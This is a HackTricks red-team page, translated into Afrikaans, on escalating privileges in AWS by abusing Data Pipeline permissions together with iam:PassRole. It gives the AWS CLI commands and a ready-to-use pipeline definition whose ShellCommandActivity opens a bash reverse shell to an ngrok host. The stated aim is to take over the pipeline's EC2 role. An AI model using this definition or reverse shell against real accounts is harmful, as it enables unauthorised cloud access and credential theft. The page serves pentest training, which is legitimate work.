AWS - Datapipeline Privesc

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

datapipeline

Vir meer inligting oor datapipeline, kyk:

pageAWS - DataPipeline, CodePipeline & CodeCommit Enum

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Gebruikers met hierdie toestemmings kan voorregte verhoog deur 'n Data Pipeline te skep om willekeurige opdragte uit te voer met die toestemmings van die toegewese rol:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

Na die skep van die pyplyn, werk die aanvaller sy definisie by om spesifieke aksies of hulpbron skeppings te bepaal:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

Let daarop dat die rol in lyn 14, 15 en 27 'n rol moet wees wat deur datapipeline.amazonaws.com aangeneem kan word en die rol in lyn 28 moet 'n rol wees wat deur ec2.amazonaws.com aangeneem kan word met 'n EC2 profiel instansie.

Verder sal die EC2 instansie slegs toegang hê tot die rol wat deur die EC2 instansie aangeneem kan word (so jy kan slegs daardie een steel).

```bash aws datapipeline put-pipeline-definition --pipeline-id \ --pipeline-definition file:///pipeline/definition.json ``` Die **pipeline definisie lêer, wat deur die aanvaller geskep is, bevat riglyne om opdragte uit te voer** of hulpbronne te skep via die AWS API, deur gebruik te maak van die Data Pipeline se rol toestemmings om moontlik addisionele bevoegdhede te verkry.

Potensiële Impak: Direkte bevoorregte toegang tot die gespesifiseerde ec2-diensrol.

Verwysings

Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated